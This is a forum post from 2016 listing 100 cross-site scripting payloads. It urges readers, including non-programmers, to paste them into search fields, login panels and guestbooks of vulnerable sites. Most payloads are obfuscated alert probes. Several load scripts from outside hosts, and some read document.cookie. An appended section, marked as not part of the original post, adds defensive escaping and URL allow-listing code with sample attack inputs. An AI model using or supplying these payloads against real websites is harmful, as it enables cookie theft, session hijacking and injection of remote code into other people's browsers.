12-03-2016, 01:00 PM
I am sharing with you XSS payloads that you can use on sites with a Cross-Site Scripting (XSS) vulnerability. These codes will be especially useful to those who do not know the JavaScript programming language. If a site has a Cross-Site Scripting (XSS) vulnerability, you can obtain various results by running these codes in the relevant fields on that site. You can adapt these codes to your own needs or use them as they are.
Where are XSS vulnerabilities found?
In website search sections
In member login panels
In administrator login panels
In guestbooks
and similar places
Code:
1) <iframe %00 src="	javascript:prompt(1)	"%00>
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
3) <input/onmouseover="javaSCRIPT:confirm(1)"
4) <sVg><scRipt %00>alert(1) {Opera}
5) <img/src=`%00` onerror=this.onerror=confirm(1)
6) <form><isindex formaction="javascript:confirm(1)"
7) <img src=`%00`
 onerror=alert(1)

8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
12) "><h1/onmouseover='\u0061lert(1)'>%00
13) <iframe/src="data:text/html,<svg onload=alert(1)>">
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
18) <iframe src=javascript:alert(document.location)>
19) <form><a href="javascript:\u0061lert(1)">X
20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
21) <img/ src=`~` onerror=prompt(1)>
22) <form><iframe src="javascript:alert(1)" ;>
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" >X</a
24) http://www.google<script .com>alert(document.location)</script
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
26) <img/src=@
onerror = prompt('1')
27) <style/onload=prompt('XSS')
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
29) </style ><script :-(>/**/alert(document.location)/**/</script :-(
30) �</form><input type="date" onfocus="alert(1)">
31) <form><textarea
onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
33) <iframe srcdoc='<body onload=prompt(1)>'>
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
35) <script ~~~>alert(0%0)</script ~~~>
36) <style/onload=<!-- > alert (1)>
37) <///style///><span %2F onmousemove='alert(1)'>SPAN
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
40)
<blink/
onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
41) <marquee onstart='javascript:alert(1)'>^__^
42) <div/style="width:expression(confirm(1))">X</div> {IE7}
43) <iframe/%00/ src=javaSCRIPT:alert(1)
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
48) <a/href="javascript:
javascript:prompt(1)"><input type="X">
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
51) <a href="javascript:\u0061le%72t(1)"><button>
52) <div onmouseover='alert(1)'>DIV</div>
53) <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
54) <a href="jAvAsCrIpT:alert(1)">X</a>
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
57) <var onmouseover="prompt(1)">On Mouse Over</var>
58) <a href=javascript:alert(document.cookie)>Click Here</a>
59) <img src="/" =_=" title="onerror='prompt(1)'">
60) <%<!--'%><script>alert(1);</script -->
61) <script src="data:text/javascript,alert(1)"></script>
62) <iframe/src \/\/onload = prompt(1)
63) <iframe/onreadystatechange=alert(1)
64) <svg/onload=alert(1)
65) <input value=<><iframe/src=javascript:confirm(1)
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
67) http://www.<script>alert(1)</script .com
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
69) <svg><script ?>alert(1)
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
71) <img src=`xx:xx`onerror=alert(1)>
72) <img src=`xx:xx`onerror=alert(1)>
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
76) <svg contentScriptType=text/vbs><script>MsgBox+1
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
81) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
82) <object data=javascript:\u0061le%72t(1)>
83) <script>+-+-1-+-+alert(1)</script>
84) <body/onload=<!-->
alert(1)>
85) <script itworksinallbrowsers>/*<script* */alert(1)</script
86) <img src ?itworksonchrome?\/onerror = alert(1)
87) <svg><script>//
confirm(1);</script </svg>
88) <svg><script onlypossibleinopera:-)> alert(1)
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
90) <script x> alert(1) </script 1=2
91) <div/onmouseover='alert(1)'> style="x:">
92) <--`<img/src=` onerror=alert(1)> --!>
93) <script/src=data:text/javascript,alert(1)></script>
94) <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
95) "><img src=x onerror=window.open('https://www.google.com/');>
96) <form><button formaction=javascript:alert(1)>CLICKME
97) <math><a xlink:href="//jsfiddle.net/t846h/">click
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
100) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
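On the defending side, the vectors above are neutralised by two controls: HTML-encoding untrusted text on output, and allow-listing URL schemes after normalising the value the way browsers do (which is what defeats the mixed-case, whitespace-split and `data:` variants). The following is an added example, not part of the original post; the names `escapeHtml`, `safeUrl`, `renderLink` and the scheme allow-list are assumptions.

```javascript
// Added defensive example; names and the allow-list are illustrative assumptions.

// Encode untrusted text for HTML body and quoted-attribute contexts.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#39;', '`': '&#96;',
};
function escapeHtml(text) {
  return String(text).replace(/[&<>"'`]/g, (ch) => HTML_ENTITIES[ch]);
}

// Schemes a user-supplied link may use (assumption: adjust per application).
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

// Return a URL that is safe to place in href/src, or '#' if the scheme is
// not allowed. Browsers drop tab, LF and CR anywhere in a URL and ignore
// leading control characters and spaces, so the same normalisation is
// applied before the scheme is read.
function safeUrl(raw) {
  const cleaned = String(raw)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+/, '');
  const match = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  if (match === null) return cleaned; // no scheme: treated as a relative URL
  return ALLOWED_SCHEMES.has(match[1].toLowerCase()) ? cleaned : '#';
}

// Build a link from untrusted parts: validate the URL, then encode both values.
function renderLink(url, label) {
  return `<a href="${escapeHtml(safeUrl(url))}">${escapeHtml(label)}</a>`;
}

// Constructed sample inputs mirroring obfuscation styles seen in the list above.
const samples = [
  'jAvAsCrIpT:alert(1)',                     // mixed-case scheme
  'j\ta\tv\ta\ts\tc\tr\ti\tp\tt\t:alert(1)', // tabs inside the scheme
  'data:text/html,<svg onload=alert(1)>',    // data: URI
  'https://example.com/?q=1',                // legitimate link
];
for (const s of samples) {
  console.log(JSON.stringify(s), '->', renderLink(s, 'X'));
}
```

`escapeHtml` covers HTML body and quoted-attribute contexts only; values placed inside `<script>`, `<style>` or event-handler attributes need context-specific encoding or should not be accepted from users at all.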